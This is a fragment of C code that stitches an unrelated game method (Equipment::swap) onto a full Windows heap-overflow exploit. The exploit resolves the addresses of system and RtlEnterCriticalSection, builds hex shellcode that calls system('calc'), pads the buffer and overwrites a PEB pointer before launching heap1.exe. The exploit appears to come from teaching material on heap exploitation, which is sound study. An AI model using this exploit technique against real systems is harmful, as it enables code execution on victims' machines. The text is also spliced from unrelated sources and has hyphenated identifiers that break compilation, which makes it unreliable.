bool Equipment::swap(Item* item, Item** resultItem) { if (_type != item->getEquipType()) return false; if (isEquipped()) { //resultItem* = _item; undress(resultItem); } return dress(item); }
int main() { unsigned char buffer[300]=""; unsigned char heap[8]=""; unsigned char pebf[8]=""; unsigned char shellcode[200]=""; unsigned int address_of_system = 0; unsigned int address_of_RtlEnterCriticalSection = 0; unsigned char tmp[8]=""; unsigned int cnt = 0; printf("Getting addresses...\n"); address_of_system = GetAddress("msvcrt.dll","system"); address_of_RtlEnterCriticalSection = GetAd-dress("ntdll.dll","RtlEnterCriticalSection"); if(address_of_system == 0 || ad-dress_of_RtlEnterCriticalSection == 0) return printf("Failed to get addresses\n"); printf("Address of msvcrt.system\t\t\t= %.8X\n",address_of_system); printf("Address of ntdll.RtlEnterCriticalSection\t= %.8X\n",address_of_RtlEnterCriticalSection); strcpy(buffer,"heap1 "); // Shellcode - repairs the PEB then calls system("calc"); strcat(buffer,"\"\x90\x90\x90\x90\x01\x90\x90\x6A\x30\x59\x64\x8B\x01\xB9"); fixupaddresses(tmp,address_of_RtlEnterCriticalSection); strcat(buffer,tmp); strcat(buffer,"\x89\x48\x20\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9"); fixupaddresses(tmp,address_of_system); strcat(buffer,tmp); strcat(buffer,"\xFF\xD1"); // Padding while(cnt < 58) { strcat(buffer,"DDDD"); cnt ++; } // Pointer to RtlEnterCriticalSection pointer - 4 in PEB strcat(buffer,"\x1C\xF0\xFD\x7f"); // Pointer to heap and thus shellcode strcat(buffer,"\x88\x06\x35"); strcat(buffer,"\""); printf("\nExecuting heap1.exe... calc should open.\n"); system(buffer); return 0; }